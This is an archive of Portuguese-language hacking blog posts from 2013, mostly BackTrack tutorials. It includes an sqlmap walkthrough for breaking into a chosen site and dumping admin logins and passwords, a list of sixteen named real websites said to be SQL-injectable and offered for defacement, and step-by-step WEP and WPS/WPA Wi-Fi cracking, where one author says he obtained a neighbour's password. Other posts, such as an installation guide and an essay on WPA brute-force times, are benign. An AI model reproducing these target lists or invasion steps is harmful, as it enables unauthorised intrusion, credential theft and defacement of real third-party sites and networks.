Latest Posts
Mostrando postagens com marcador backtrack tutoriais. Mostrar todas as postagens
Mostrando postagens com marcador backtrack tutoriais. Mostrar todas as postagens

domingo, 13 de outubro de 2013

Tutorial Usando SqlMap (invasão site )



Vou ensinar um metodo pra invadir um site !

escolha o site que vai invadir , ele vai ter que ter uma vunabilidade
ae e de voce descobri-la

digite o seguinte comando

Código:
sqlmap.py -u sitequevaiinvadir --dbs



-- dbs , voce digita pra descobrir as databases do site

depois disso , voce vai e digita o seguinte comando

Código:
sqlmap.py -u sitequevaiinvadir -D dabase escolhida --tables

esse comando e pra descobrir , as tabelas dessa data base

vai aparecer algo tipo assim
+---------------+
| admin |
| publicidade |
| teste |
+---------------+

ae coloca o seguinte codigo

Código:
sqlmap.py -u sitequevaiinvadir -D database_escolhida -T admin --columns

esse codigo voce vai acesser uma certa em modo de colunas esse tabela

--columns e pra descobrir as colunas que tem dentro da tabela

o resultado sera +- assim

+--------+--------------+
| Column | Type |
+--------+--------------+
| ID | int(11) |
| login | varchar(255) |
| senha | varchar(255) |
+--------+--------------+

ae voce digita assim

Código:
sqlmap.py -u site_escolhido -D data_base -T admin -C 'login,senha' --dump

-C 'login,senha' <~~ essa parte voce tem que colocar dentro as colunas que quer descobrir , tem que colocar exatamente oque ta escrito
--dump < ~~ descobrir tudo sobre essa coluna

dae voce ja descobriu o login e senha do site quando digitar esses comandos

so logar no site e pronto , !

Downloads :

Active Python- > http://www.activestate.com/activepython/downloads
SqlMap - > http://www.4shared.com/rar/y0B585-M/...p-1088011.html

Galera , Se For Usar Esse Metodo , Por Favor Da Um OBRIGADO Por Favor
more »

Lista De Sites Vulneraveis a SQL Injection #1

Eai galerinha , hoje vou trazer a vocês uma lista de sites vulneraveis a SQL Injection  ,  todos foram scaneados por mim , todos tem uma falha contra SQL Injection , aproveitem e testem seus defaces .

Segue a lista dos mesmos :

http://www.perutributos.com/noticias.php?id=15
'
http://www.ifai.gov.ar/noticias.php?id=15
'
http://www.greenvalley.art.br/noticias.php?id=15
'
http://www.antoniomorales.com/en/noticias.php?id=15
'
http://www.mylan.pt/pages/noticias.php?id=15
'
http://procasaweb.com.mx/noticias.php?id=15
'
http://www.resitech.com.br/noticias.php?id=15
'
http://coipri.pe/noticias.php?id=15
'
http://www.mitsuiautomotriz.com/noticias.php?id=15
'
http://www.vwgoldstein.com.ar/noticias.php?id=15
'
http://www.coopersulms.com.br/noticias.php?id=15
'
http://www.vincilab.com/noticias.php?id=15
'
http://www.bmea.com.br/noticias.php?id=15
'
http://www.varaderoalicante.com/noticias.php?Id=15
'
http://www.agronomicosalesiano.edu.ec/noticias.php?id=15
'
http://www.altivopedras.com/noticias.php?id=15
'
more »

quarta-feira, 9 de outubro de 2013

Como quebrar segurança WEP


Então pessoal, devido a grande  transtorno de não poder estar respondendo a todas as perguntas feita nos comentários do yoube, venho lhes informar que a partir de agora em diante perguntas,
pedidos, suporte e informações serão apenas respondidas e atendidas na page do canal Igor Tech
Page para dúvidas,informações, suporte e pedidos
https://www.facebook.com/igoortech

Blog para downloads, tutoriais
http://igoortech.blogspot.com.br/

Canal do parceiro Akso
http://www.youtube.com/lKingGnik
Passo a passo de como quebrar a senha wep em 9 comandos


Faça download do backtrack 5 depos grave e de boot no dvd e vai pedir senha e login

login: root
senha: toor
depois digite (startx) sem parentese para iniciar o backtrack 4

Abra o console para digitar os comandos

1: airmon-ng (esse comando faz com que o bt4 reconheça sua placa de rede)
2: airmon-ng start wlan0 (esse comando faz com que fique em modo monitor)
3: airodump-ng mon0 (esse comando faz com que ele procure as redes ao seu redor)

abra outro console

4: airodump-ng --bssid (bssid) --channel x --ivs -w nome rede mon0 (esse comando faz com que vc monitore a rede da vitima)

abra outro console

5: aireplay-ng -5 -b (bssid) mon0 (espere ele vai pedir para você digitar y (yes) depois enter. Com esse comando você pega os pacotes da vitima)

abra outro console

6: aireplay-ng -1 1 -a (bssid) mon0 (esse comando captura os pacotes criptografados da vitima)

abra outro console

7: packetforge-ng -0 -a (bssid) -h 00:11:22:33:44:55 -k 255.255.255.255 -l 255.255.255.255 -y (fragments) -w arpy(esse comando captura os date da vitima)

abra outro console

8: airopley-ng -3 -r arpy -b (bssid) mon0

abra outro console

9: aircrack-ng nome rede-01.ivs(aqui é o final e a hora de você saber a senha da rede wep. Eu aconselho a você esperar
pelo menos ate 10.000 pacotes para pegar a senha, mas se você quiser com 5.000 pacotes é aceitável).
more »

domingo, 22 de setembro de 2013

Backtrack 5 R3 agora com suporte para Arduino

A melhor ferramenta para realização de testes de penetração e segurança a rede informáticas
Normalmente quase se fala na distribuição BackTrack, tende-se de imediato a associar ao Hacking e outras actividades informáticas menos decentes. Todos nós sabemos que a segurança em sistemas de informação é um ponto sensível e cada vez mais, um maior motivo de preocupação por parte dos utilizadores de qualquer tipo de rede, seja ela local ou Internet.
Nesse sentido é necessário possuir as ferramentas certas sendo o Backtrack a suite/distribuição ideal para realizar algumas auditorias aos nossos sistemas e redes.
Depois de há 5 meses termos apresentado aqui as novidades do Backtrack 5 R2, vamos conhecer as novidades do Backtrack 5 R3.
backtrack_02

A terceira versão do popular bactrack 5 corrige um conjunto de bugs detectados na versão anterior e inclui mais de 60 novas ferramentas. A distribuição incluiu uma categoria completamente nova, à qual foi dado o nome dephysical exploitation.  Esta nova categoria inclui bibliotecas o IDE para desenvolvimento em Arduino e o Kautilya toolkit que oferece funcionalidades para a board de desenvolvimento Teensy USB .
Além das novas ferramentas, o Backtrack 5 R3 incluiu muitas outras de grande utilidade.
backtrack_01
Como actualizar do Backtrack 5 R2 para o Backtrack 5 R3?
Quem já tiver o backtrack 5 R2 instalado e pretenda efectuar uma simples actualização, basta abrir o terminal e inserir os seguintes comandos:
apt-get update && apt-get dist-upgrade
[Sistema 32 bits]
sudo apt-get install libcrafter blueranger dbd inundator intersect mercury cutycapt trixd00r artemisa rifiuti2 netgear-telnetenable jboss-autopwn deblaze sakis3g voiphoney apache-users phrasendrescher kautilya manglefizz rainbowcrack rainbowcrack-mt lynis-audit spooftooph wifihoney twofi truecrack uberharvest acccheck statsprocessor iphoneanalyzer jad javasnoop mitmproxy ewizard multimac netsniff-ng smbexec websploit dnmap johnny unix-privesc-check sslcaudit dhcpig intercepter-ng u3-pwn binwalk laudanum wifite tnscmd10g bluepot dotdotpwn subterfuge jigsaw urlcrazy creddump android-sdk apktool ded dex2jar droidbox smali termineter bbqsql htexploit smartphone-pentest-framework fern-wifi-cracker powersploit webhandler
[Sistema 64 bits]
install libcrafter blueranger dbd inundator intersect mercury cutycapt trixd00r rifiuti2 netgear-telnetenable jboss-autopwn deblaze sakis3g voiphoney apache-users phrasendrescher kautilya manglefizz rainbowcrack rainbowcrack-mt lynis-audit spooftooph wifihoney twofi truecrack acccheck statsprocessor iphoneanalyzer jad javasnoop mitmproxy ewizard multimac netsniff-ng smbexec websploit dnmap johnny unix-privesc-check sslcaudit dhcpig intercepter-ng u3-pwn binwalk laudanum wifite tnscmd10g bluepot dotdotpwn subterfuge jigsaw urlcrazy creddump android-sdk apktool ded dex2jar droidbox smali termineter multiforcer bbqsql htexploit smartphone-pentest-framework fern-wifi-cracker powersploit webhandler
O Backtrack é bastante conhecido pelas ferramentas de penetração e auditoria de redes que disponibiliza. Está tudo compilado e pronto a funcionar. Experimentem! Para quem pretender instalar de raiz, deixamos aqui um pequeno guia.

Licença: GNU
Sistemas Operativos: Linux
Download: BT5-R3 Gnome-32bits|BT5-R3-Gnome-64bits (via torrent)
Download: BT5-R3 KDE-32bits|BT5-R3-KDE-64bits (via torrent)
Download: [VMware] BT5-R2 GNOME-32bits
Homepage: BackTrack
more »

quarta-feira, 11 de setembro de 2013

BAcktack tutorials forum

Todo tipo de tutorial para backtrack você encontra aqui









more »

CURSO BACK TRACK 5


Back track 5 é de longe a melhor de todas as distribuições linux voltada ao universo de auditoria e invasão.

Com conteudo Super completo, abrangendo mais de 300 ferramentas de analises, vunerabilidades, invasão, pentest e tantas outras que acompanham essa distro.
E depois de tanto estudar e pesquisar achei esse maravilhoso curso em video-aula, que tenho o prazer de compartilhar com voces.

Segue abaixo  o link do curso. 


Back track 5 aula 1.
Back track5 aula 2.
Back track 5 aula 3
Back track 5 aula 4.
Back track 5 aula 5.

Back track 5 aula 6.
Back track 5 aula 7
Back track 5 aula 8.
Back track 5 aula 9.

As video-aulas se encontram em espanhol e tem duração de mais de 7hrs.
more »

Aprenda a instalar o BackTrack 5

Como é hábito da nossa parte, costumamos marcar o lançamento de algumas distribuições com um pequeno tutorial do processo de instalação. Dessa forma deixam de existir motivos para não experimentar e quem sabe até ficar fã.
Como muitos de vocês, (ainda ontem), assim que tive tempo, a primeira coisa a fazer quando cheguei a casa foi instalar o Backtrack 5. Relembrados que o BackTrack 5 é baseado no Ubuntu 10.04 LTS, tem suporte para o ambiente gráfico Gnome (além do KDE e Flubox), suporte para sistemas de 32 e 64 bits e ARM e é totalmenteopen source. Deixo alguns screens para verem como é fácil a instalação.
bt_000
Para instalar o Backtrack 5 devem seguir os seguintes passos:
Passo 1 – Fazer download do Backtrack 5 aqui
Passo 2 – Gravar num DVD ou PenUSB e fazer boot. No primeiro ecrã devem escolher a opção: BackTrack Text – Default Boot Text Mode
bt_00
Passo 3 – Para iniciarem o interface gráfico para procederem a instalação, devem escrever “startx” . Não esquecer que as credenciais de acesso para o Backtrack são:
User: root
Password: toor
bt_01
Passo 4 – Depois de arrancar em modo live, basta escolher a opção Install BackTrack.
bt_02
Passo 5 – Vamos agora escolher o idioma de instalação
bt_03
Passo 6 – Vamos agora definir o nosso fuso horário
bt_04
Passo 7 – E agora indicamos qual o layout do nosso teclado
bt_05
Passo 8 – Preparar o espaço em disco. Para quem pretender definir partições, poderá ver aqui como fazer. Para este exemplo, definimos a opção Apagar e utilizador o disco inteiro que irá proceder a formatação de todo o disco e instalação do Ubuntu.
Atenção: Ao escolher esta opção, toda a informação do disco será apagada. Caso pretenda usar uma determinada partição, deverá escolher a opção Especificar as partições manualmente (avançado).
bt_06
Passo 9 – Finalizadas as configurações, é só mandar instalar.
bt_08

Depois é só esperar e deixar instalar. No meu PC, o BT5 demorou cerca de 30 minutos a instalar.
bt_07
Depois de instalador, basta reiniciar e na hora de introduzir as credenciais coloquem as indicadas no passo 3(depois podem mudar ).
bt_09
Com podem ver pela imagem anterior, o Backtrack é bastante conhecido pelas ferramentas de penetração e auditoria de redes que disponibiliza. Está tudo compilado e pronto a funcionar. Experimentem!
Artigos relacionados
more »

Tutorial: Como descobrir a senha do Wi-Fi que usa criptografia WEP (Ethical Hacking)

Olá a todos
Hoje gostaria de mostrar pra vcs como pode ser feito para descobrir a senha do Wi-Fi de um Access Point configurado com a criptografia WEP
Para esse tutorial estou usando o Kali Linux
Para instalar e configurar o Kali Linux no Virtual Box você pode seguir nossa dica
Vale lembrar que caso esteja usando no Virtual Box, vc vai precisar de uma placa de rede Wi-Fi USB e adicionar ela no menu “Devices/USB Devices” e selecionar a placa USB para que ela possa ser reconhecida pela VM, agora caso vc esteja rodando direto no metal daí ele já vai reconhecer a própria placa que tiver no PC ou Note.
No Terminal Digite um ifconfig para verificar qual é sua placa de rede wireless no nosso caso é a Wlan0 daí digite o seguinte:
# airmon-ng start wlan0
Isso vai colocar a placa em modo monitor note que será criada uma nova interface no caso amon0, após isso digite:
# airodump-ng -i mon0
Será exibido uma tela semelhante a essa
ScreenHunter_21 Apr. 24 10.18

Na tela acima é possível visualizar todas as redes ao alcance no caso a que queremos é que tem a cripotografia WEP e devemos tomar nota das seguintes informações o BSSID o Canal que é onde está como CH e o ESSID que é o nome da rede.
Com essas informações em mãos vamos executar o próximo comando:
# airodump-ng --ivs -w wep --channel 6 -bssid 00:00:00:00:00:01 mon0
Onde vc deve substituir wep pelo nome que desejar, isso é apenas o prefixo do arquivo que será gerado, ex: wep-01.ivs, wep-02.ivs etc..
Substitua em o valor em –channel o pelo número do seu canal obtido em no campo CH no primeiro comando que foi executado
Substitua em o valor em –bssid pelo número do seu BSSID obtido no campo BSSID do primero comando que foi executado
Se tudo estiver correto vc ver uma tela semelhante a essa abaixo:
ScreenHunter_22 Apr. 24 10.42

O próximo passo é deixar executando o comando acima e gerar algum tráfego para que possamos fazer a quebra da senha, podemos simular algumas tentativas de associação com o AP e gerar algum tráfego com os comandos:
# aireplay-ng -1 0 -e dlink-test -a 00:00:00:00:00:01 -h 00:00:00:00:00:02 mon0
# aireplay-ng -3 -b 00:00:00:00:00:01 -h 00:00:00:00:00:02 mon0
No primeiro comando substitua o valor de -e pelo valor do seu ESSID obtido no primeiro comando
Onde está o valor de -a vc vai colocar o BSSID do Access Point e no valor de -h vc vai colocar o seu MAC Address.
No segundo comando substitua o valor de -b pelo seu BSSID e no valor de -h vc vai colocar o seu MAC Address.
Deixe o segundo aireplay-ng executando um tempo até gerar dados suficiente para a quebra da criptografia
Vai ficar mais ou menos assim
ScreenHunter_21 Apr. 24 10.42

Agora vem a melhor parte, para descobrir a senha do wi-fi após capturar algum tempo, no meu caso uns 5min. é só executar o seguinte
# aircrack-ng -a 1 wep-01.ivs
Onde evidentemente vc deve trocar wep-01.ivs pelo arquivo ivs que vc gerou, daí a senha será vista da seguinte maneira:
ScreenHunter_22 Apr. 24 10.47
No caso acima a senha é 12345
Só tem um jeito de se prevenir contra isso, nunca jamais use WEP!!!
Como descobrir a senha do wifi de qualquer roteador que tenha a função WPS ativada independente do tipo de criptografia usada
Como descobrir a senha do wifi de roteadores com a criptografia WPA2 ativada veja essa dica aqui
Espero que tenham gostado.
Não se esqueça de compartilhar e assinar nosso blog.
Abraços e até a próxima
more »

Quanto tempo leva para quebrar uma chave WPA ou WPA2?

Existe vários vídeos no Youtube e comentários em blogs descrevendo como "quebrar" chaves WPA e WPA2. O WEP tem um bug grave, que permite com que a chave seja descoberta rapidamente, mas no caso do WPA ou WPA2 os únicos métodos publicados e provados são dicionário ou força bruta.

Existe um post correndo na Internet sobre dois pesquisados japoneses que teriam descoberto uma maneira de quebrar parcialmente o WPA TKIP (esse suposto método não atingiria WPA AES nem o WPA2). Isso foi inclusive comentado aqui no Under-Linux em um post recente de outro blog.

Quando falo em "suposto método" é porque todos os textos que apareceram na Internet eram muito parecidos, mas depois disso não vi mais nenhum comentário. O nome dos pesquisadores aparentemente são válidos (pois existem textos relacionados a criptografia nomeando os dois), mas não encontrei nenhuma referência ao texto que eles iriam divulgar no evento que ocorreu semana passada. Além disso, em muitos sites (como Yahoo Tech) a notícia foi removida.

Em resumo: ninguém apareceu até agora para confirmar se a dedução em "matematiquês" está correta ou não. 

Mas vamos considerar que o WPA TKIP seja realmente passível de quebra por algum algoritmo, então vamos nos focar no WPA AES e WPA2.

Em ambos os protocolos, como citei acima, a chave só pode ser quebrada (até onde se sabe) via ataque de dicionário ou força bruta.

O ataque de dicionário está relacionado à má escolha da chave. Por exemplo, um administrador escolhe como chave a seqüência "123456789". No ataque de dicionário o atacante possui uma lista de palavras (o dicionário) contendo várias senhas possíveis e o programa atacante tenta todas elas. Se a chave foi mal escolhida pelo administrador, ela deve estar na lista de palavras e eventualmente o programa identifica, informando o hacker.

Vale salientar que o programa de ataque tem que tentar uma por uma todas as chaves. Se for uma lista de um milhão de palavras, o programa vai testar todas. 

Existe para download nos sites de hackers, várias listas de dicionários que um atacante pode usar e tentar a sorte. Mas é apenas isso: pura sorte (e falta de consciência do administrador da rede atacada).

Quando vemos os vídeos do Youtube, descrevendo como se ataca WPA ou WPA2, são ataques de dicionário. Obviamente que o "atacante" neste caso teve o cuidado de colocar uma chave WPA que estava no dicionário usado, então ele tem sucesso. A primeira vista, dá impressão que ele invadiu a rede em menos de 1 minuto, mas na verdade ele estava apenas demonstrando que o ataque precisa de sorte: o administrador tem que escolher uma senha fácil e que "por sorte" estava no dicionário pequeno que ele usou.

No entanto, qualquer senha que tenha sido escolhida com um pouco de cuidado, não estará no dicionário. Não estou falando de senhas como "6$gs5SD45Diad", mas coisas como "AbC345SoRtE" já são relativamente boas.

Nesse caso, quando o administrador fez uma boa escolha, a única alternativa do atacante é testar TODAS as chaves possíveis, uma a uma. Esse é o chamado método da força bruta.

Nesse caso, quanto tempo levaria para um atacante testar todas as chaves?

Lembre, cada chave pode ter caracteres maiúsculos e minúsculos, além de símbolos (%$&#@) e números. Na verdade, pode inclusive ser composta de qualquer número hexadecimal de 00 a FF. Mas vamos focar apenas no tradicional: letras, números e símbolos. Isso dá aproximadamente 70 caracteres possíveis.

Assim o atacante tem que tentar todas as chaves de 1 caracter (70 opções, fácil), depois todas de 2 caracteres (70 x 70 = 4.900 opções diferentes), depois todas de 3 caracteres (343.000 opções) e assim diante. 

Além disso, por uma questão de estatística, em média, será necessário testar metade das opções para encontra a chave correta. Assim se levar 2 horas para testar todas as combinações, em média será necessário 1 hora para achar a chave correta (quem não gosta de estatística, apenas acredite em mim).

Então, vamos responder à pergunta: quanto tempo em média um hacker irá demorar para encontrar a chave correta?

Antes, algumas informações básicas: um bom computador deve ser capaz de testar 100 chaves por segundo. Vamos então imaginar que o hacker tenha um super computador, capaz de testar 100.000 chaves por segundo!!! Vamos dar a ele muito dinheiro, ele tem um mega-super-blaster computador, tudo bem. Jóia.

Também vamos lembrar algumas informações úteis:
- um ano tem 31.536.000 segundos
- a chance de ganhar na megasena com um jogo de 6 dezenas é de 1 em 50 milhões (aproximadamente)
- estima-se que o universo tenha 14,5 bilhões de anos.

Vamos ver as chances de sucesso desse hacker contra um administrador que escolheu uma boa senha (ou seja, uma senha que não esteja em um dicionário).

Chaves de 5 Caracteres

Com uma chave de 5 caracteres, temos 70x70x70x70x70 combinações (para os matemáticos de plantão, não quero falar de exponenciação) ou aproximadamente 1,68 bilhões de combinações.
O mega computador iria demorar quase 16.807 segundos para testar todas. Estatisticamente seria necessário, em média, metade desse tempo para encontrar a chave, ou 8.404 segundo ou quase 2 horas e meia.

Ok, nada mal. Parece fácil, basta ter um super computador. 5 não é um bom tamanho. Vamos continuar

Chave de 10 Caracteres

Teriamos 70x70x70x70x70x70x70x70x70x70 possibilidade ou mais de 2,8 quatrilhões de opções (chega quase na fortuna do Tio Patinhas). Usando o mega-blaster computer, dá um tempo 1,5 milhões de anos em média. 

A chance dele conseguir encontrar essa chave em um prazo de 1 ano é menor que 1 em 1 milhão.

Vamos subir um pouco mais

Chave de 20 Caracteres

O padrão 802.11i recomenda que chave seja de pelo menos 20 caracteres. Nesse caso (não vou escrever "70x" vinte vezes) dá um número gigantesco de opções. Com o super-mega-blaster computador levaria 318 trilhões de vezes a idade do Universo. Ou seja, o hacker necessitaria que o Universo surgisse de novo 318 trilhões de vezes para ele encontrar a chave.

Mas vamos um pouco mais além. Vamos supor que o hacker tem um Deep Blue, o super computador da IBM que ganhou do campeão de xadrez (e mal perdedor) Garry Kasparov. O Deep Blue fazia 5 bilhões de operações por segundo. Para verificar uma chave são necessárias várias operações, mas vamos fazer de conta que ele conseguisse testar 1 chave por operação. Qual seria o tempo necessário? 92 sextilhões de anos, em média ou "apenas" 6 bilhões de vezes mais que o nosso universo existe.

Agora vamos pensar que esse hacker consiga cobrir todo o planta Terra com Deep Blues. Colocando 10 computadores por metro quadrado (inclusive sobre mares, geleiras e florestas). Isso daria 5,1 quintilhões de computadores trabalhando em rede. O tempo cairia para 18.000 anos em média.

Chave de 64 Caracteres

O tamanho máximo permitido para uma chave WPA ou WPA2 é de 64 caracteres. 

O tempo para um hacker quebrar uma chave de 64 caracteres usando o planeta Terra coberto de Deep Blues seria de 2,7E85 anos (escreva 27 e depois coloque mais 84 zeros). É um número maior que a quantidade estimada de partículas (átomos) no Universo.

Agora vamos imaginar que o nosso hacker tenha assistido Guerra nas Estrelas e queira construir uma Estrela da Morte Deep Blue. Um objeto do tamanho do nosso Sol, totalmente recheado de Deep Blue. Ele teria que evitar o problema da atração gravitacional, porque tanta massa transformaria esse objeto em um buraco negro. Mas ele tem o lado negro da força com ele, então ele resolveria esse problema.

Sem aprofundar em detalhes, o tempo cairia para "apenas" 1,17E71 anos. Escreva ai: 117 e depois mais 69 zeros. Se não estou enganado isso se leria 117 duotrigintilhões de anos.

more »

Crack automático de redes Wireless com Backtrack (WEP, WPA/WPA2)

ocê quer testar a segurança de uma rede WiFi sem ter muito trabalho? É facil ! Basta instalar Wiffy em seu BackTrack 5, sentar e relaxar.
Veja abaixo detalhes sobre a ferramenta:






Wiffy nada mais é do que um script bash para automatizar o processo de crack de uma rede WiFi. Suporta WEP , WPA/WPA2, filtragem de MAC e SSID oculto.
Como funciona ?
* Escaneia por redes wireless e salva os dados obtidos
* Configura a placa de rede
* Tenta detectar clientes conectados
* Inicia a captura de dados
* Dependendo do tipo da encriptação da rede wireless – inicia ataque de acordo com o tipo da rede.
*  Após dados serem coletados inicia o processo de quebra da chave WiFi
O que você precisa?* o script bash: wiffy.sh
* uma placa wireless — que suporta modo monitor
* Dicionários/Lista de palavras — para usar com WPA/WPA2
* aircrack-ng suite, macchanger — tudo isso já disponível no su Backtrack!
Como usar:
1. Edit wiffy.sh, via linha de comando, e especifique o nome da sua interface. (Você pode ver o nome via ifconfig e usar o Vi para editar. o padrão é wlan0)
2. Especifique o caminho e nome da sua wordlist: wordlist=”wpa.txt”
3. No wiffy.sh localize  ”/usr/bin/macchanger” e altere para “/usr/local/bin/macchanger”

4. Selecione o ESSID ou BSSID
5. Espere …
6. Pronto !!!
Baixar versão 0.2  beta : wiffy.sh v0.2 (#0 BETA #6) ~ 2011-03-17
more »

Mas para que serve o BackTrack mesmo ?

Tem muita gente me perguntando isso e a resposta é simples: O BackTrack é a melhor distribuição linux focada em segurança da informação que existe no mercado. Com ela é possível realizar uma série de pentests (testes de segurança) em diversas plataformas e sistemas operacionais.

A nova versão do BackTrack, a 5, trouxe novidades bem importantes. A primeira delas foi que ela trabalha na arquitetura de 64 bits, tirando assim o máximo proveito de um notebook com um processador de 64bits e mais do que 3 gigas de ram instaladas. Um outro ponto que achei muito interessante e que está dando uma série de ideias para a galera, é que o BackTrack5 roda em máquinas com processadores ARM, e adivinhem qual é a base do IPAD?!
O BackTrack 5 já está disponível para download via Torrent e eu o baixei em menos de 20 minutos, já que o meu link é de mais de 30Mb/s – fiber channel is the best. Para aqueles que desejam ter mais detalhes de como utilizá-lo, aí vai o link de um post que eu fiz no blog e nos comentários vocês poderão baixar o livro da packt publishing, para consulta em..
more »

Tutorial sobre Hackear Wifi usando o Reaver, Backtrack (WPA e WPA2)


Olá a todos! Nossa, passei tempo sem atualizar o blog, não é mesmo? Mas é que eu passei um tempo estudando coisas da faculdade. Mas, entre um estudo e outro, eu acabei achando artigos (todos em inglês) do Linux, e gostei muito do que vi no BackTrack. O sistema operacional Linux é muito diversificado: Várias versões de sistema para cada tipo de gosto. Dando várias olhadas na interwebs, eu vi que é possível ( e de uma maneira muito fácil) quebrar senhas de roteadores. Sério. No caso, eu tive apenas que decorar 5 linhas de comando no sistema Linux BackTrack e foi o suficiente para eu conseguir achar a senha do vizinho. Claro que eu não uso o roteador do vizinho (Até porque a internet deles é muito lenta em comparação com a minha). Mas chega de papo furado, vamos ao que interessa.


O que você precisa



Você vai ter que baixar o sistema operacional Linux. Não sei se você sabe, mas todo Linux não precisa de ser instalado pra funcionar. Ele funciona direto do DVD. Daí você clica vai no site e baixa o Linux Backtrack 5 R1, certo? Olha o link: http://www.backtrack-linux.org/downloads/

Olha a foto de download, você escolhe esse esquema e faz o download.                         









Um computador com acesso Wi-Fi e uma entrada de DVD. 

Normalmente os notebooks tem placa wifi, você vai precisar do wifi pra conectar com a sua rede e com a rede alvo. Se você não tem um notebook, vai ficar difícil. Mesmo se você colocar uma antena no Desktop, vai ficar mais difícil de crackear, mas tudo bem.



Uma rede wifi com segurança WPA ou WPA2 pra crackear.

Então, como eu disse, a rede que você quer hackear tem que estar perto, se não, vai dar muito erro.



E muita paciência.

O processo de crakeamento pode demorar de 4 a 10 horas. No meu caso, gastei 5 horas e um pouco. Bom, agora que eu já falei o que é preciso, você deve estar com o Linux Backtrack dentro de um DVD e um notebook nas mãos, certo? Se sim, vamos começar, se não, tente fazer o que foi pedido acima.




Passo 1: Inicie no Backtrack

Para inicializar em Backtrack, basta colocar o DVD em sua unidade e iniciar a sua máquina a partir do disco. Não precisa formatar nada! Não precisa instalar nada! Só rodar o DVD. Durante o processo de inicialização, Backtrack vai pedir para escolher o modo de inicialização. Selecione "Backtrack Text – Default boot text mode" e pressione Enter. Igual na foto >
Depois que o Backtrack carregar, vai abrir uma caixa de comandos, igual ao MS-Dos, ou CMD. Quando você chegar lá, digite startx e pressioneEnter. Daí, o Backtrack vai iniciar com o Linux normal.


Passo 2: Instale o Reaver

O Reaver (Programa usado para crackear) Não está instalado ainda, até porque o DVD do Backtrack é só para instalação, e como não tem nada instalado, deve fazer manualmente. Para instalar Reaver, primeiro você precisa se conectar a uma rede Wi-Fi que você tem a senha, isto é, a sua.
1.      Clique em Aplicativos> Internet> Wicd Network Manager
2.      Selecione sua rede e clique em Conectar, digite sua senha, se necessário, clique em OK e, em seguida, clique em Conectar uma segunda vez.
Agora que você está online, vamos instalar Reaver. Clique no botão Terminal na barra de menu (ou clique em Aplicativos> Acessórios> Terminal). No prompt, digite:
 apt-get update
E então, após a conclusão da atualização:
 apt-get install reaver


Se tudo correu bem, Reaver agora deve ser instalado. (Então, como não tem nada instalado, você tem que fazer isso TODAS as vezes que ligar o DVD Backtrack, a não ser que tu instale.) Depois, vá em frente e se desconecte da rede, abrindo o Network Manager Wicd novamente e clicar em Desconectar. 



Passo 3: Reunir as informações do dispositivo

Para poder usar Reaver, você precisa para obter o nome da sua placa wireless, e o BSSID  do roteador que você está tentando quebrar (o BSSID é uma série única de letras e números que identifica um roteador), e você precisa ter certeza de a placa sem fio está no modo monitor. Então, vamos fazer tudo isso.
Encontre o seu cartão wifi: Ainda no “ms-dos” do Linux, digite:
 iwconfig

Pressione Enter. Você deverá ver um dispositivo sem fio na lista seguinte. Muito provavelmente, vai ser nomeado wlan0.








Coloque sua placa wireless em modo monitor: Assumindo o nome de seu cartão sem fio de interface é wlan0 , execute o seguinte comando para colocar sua placa wireless em modo monitor:
 airmon-ng start wlan0
Este comando irá mostrar o nome do monitor de interface, e isso vc tem que anotar. Muito provavelmente, vai ser mon0 , como na imagem abaixo. Não esquece, Anote o que vier depois do: “Monitor mode enabled on”, que muito provavelmente será “mon0”



Encontre o BSSID do roteador que você quer crackear: Finalmente, você precisa para obter o identificador único do roteador que você está tentando quebrar, de modo que você pode apontar Reaver na direção certa. Para fazer isso, execute o seguinte comando:
 airodump-ng wlan0
(Nota: Se airodump-ng wlan0 não funciona para você, você pode querer experimentar a interface de monitor em vez por exemplo, o que vc anotou no comando anterior, o mon0 .)
Você verá uma lista de redes sem fio, será  algo parecido com a imagem abaixo:



Quando você ver a rede que você quer, pressione Ctrl + C para interromper a lista, em seguida, copie o BSSID da rede (é a série de letras, números e dois pontos na extrema esquerda). A rede deve ter WPA ou WPA2 listado na coluna ENC.
Agora, com o BSSID e o nome de interface do monitor na mão, você tem tudo que você precisa para iniciar Reaver.

Passo 4: Crack a Rede WPA senha com Reaver

Agora execute o seguinte comando no Terminal, substituindo bssid e moninterface com a interface BSSID e monitor e você copiou acima:
Reaver -i moninterface -b bssid -vv
Por exemplo, se sua interface de monitor foi mon0 como o meu, e seu BSSID foi 8D: AE: 9D: 65:1 F: B2 (a BSSID eu acabei de inventar), o comando ficaria assim:
 Reaver -i wlan0 –b  8D: AE: 9D: 65:1 F: B2  -vv --no-nacks
Pressione Enter, sentar e deixar Reaver trabalhar a sua magia perturbadora. Reaver vai agora tentar uma série de Pins no roteador em um ataque de força bruta, um após o outro. Isso vai demorar um pouco. No meu teste bem sucedido, Reaver levou 5 horas e 30 minutos para quebrar a rede e me entregar com a senha correta. Como mencionado acima, a documentação Reaver diz que pode levar entre 4 e 10 horas, para que ele pudesse levar mais ou menos tempo do que eu experimentei, dependendo do caso. Quando Reaver quebrar a senha, ele vai ficar assim:

more »
© 2013 Igor Tech . WP Theme-junkie converted by BloggerTheme9